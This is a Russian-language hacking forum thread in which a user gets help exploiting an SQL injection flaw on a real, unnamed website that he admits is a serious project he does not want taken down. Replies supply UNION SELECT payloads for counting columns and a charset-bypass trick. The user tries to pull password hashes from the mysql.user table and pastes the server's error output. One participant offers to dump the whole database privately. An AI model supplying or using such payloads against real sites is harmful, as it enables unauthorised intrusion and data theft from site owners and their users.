Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Error sql (https://forum.antichat.xyz/showthread.php?t=25728)

Koller 21.10.2006 17:10
Error sql
 
Ситуация такая...

Цитата:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
Не раз сталкивался с подобными ошибками...
Расплывчато представляю то, как использовать подобную ошибку...
Не могли бы Вы рассказать...что да как...
И если можно с примером...

~Real F@ck!~ 21.10.2006 18:27
Скуль конкретный! Дай ссылку баги... я что нить попробую.!.!.!.!

Azazel 21.10.2006 18:54
Попробуй без кавычки, потом попробуй например id=(или чё там) несуществующее 777777777777

Koller 21.10.2006 21:32
Цитата:
Сообщение от ~Real F@ck!~
Скуль конкретный! Дай ссылку баги... я что нить попробую.!.!.!.!
Ссори, ссылку дать никак не могу...
Проект очень и очень серьезный, не хотелось бы, чтоб его напрочь снесли...В общем светить ссылку ну никак не могу...

to Azazel

Что-то вроде 77777777 вводил...выводил, что мол запись просто не найдена...
Данная ошибка, которую я описал в первом посте как я понял реагирует только тогда, когда id='
Ничего другого, именно '...
Вводил все что можно...
Какие еще будут предложения?

Goudini 21.10.2006 22:00
id=9999999+union+select+null,null,null/*
id=9999999+union+select+1,2,3/*
Подбираешь цифры пока не ищезнет сообщение
The used SELECT statements have a different number of columns
Потом можно будет доставать данные с базы

И вобще прежде чем задавать такие вопросы юзай поиск по сайту! Про sql-injection написано достаточно...

Koller 21.10.2006 23:04
Я всегда прежде чем задавать какие-то там либо вопросы обращаюсь к поиску...
Да, по поводу sql-injection написано даже придостачно...согласен...
Далеко не все понимал, когда читал например статью отсюда - _http://forum.antichat.ru/thread19844.html
Посему решил на реальном примере разобраться...прошу зла на меня держать, ежели посчитаете эту тему вовсе нубской ;)
Подобрал цифры...сообщение исчезло...
Каким образом можно достать данные с базы? Мне ведь как я понимаю нужно знать названия столбцов...как делать, не знаю...
Прошу помочь...

Цитата:
id='+union+select+1,2,3,4,5,6,7/*

Koller 21.10.2006 23:51
Постепенно начинаю понимать:

при запросе id='+union+select+1,2,3,4,5,6,7+from+users/* выдает - Table 'cj**.users' doesn't exist
при запросе id='+union+select+1,2,3,4,5,6,7,mysql.user.passwor d,null+from+mysql.user/* - Access denied for user 'pank***'@'217.23.133.***' to database 'mysql'
про запросе id='+union+select+null,null,null,null,VERSION(),nu ll,null/* выдает - Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
Что мне это все дает?
И как правильно составить все-таки запрос?

guest3297 23.10.2006 11:49
Цитата:
id='+union+select+null,null,null,null,AES_DECRYPT( AES_ENCRYPT(USER(),0x71),0x71),null,null/
Кодирова не та просто.

Koller 23.10.2006 12:50
Ввел так, ничего нового не узнал - 01.01.1970 pank***@217.23.133.***
Каким образом можно попытаться достать нужную мне информацию из БД?

guest3297 23.10.2006 12:54
Стукни в асю могу снять базу.


Время: 13:14
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице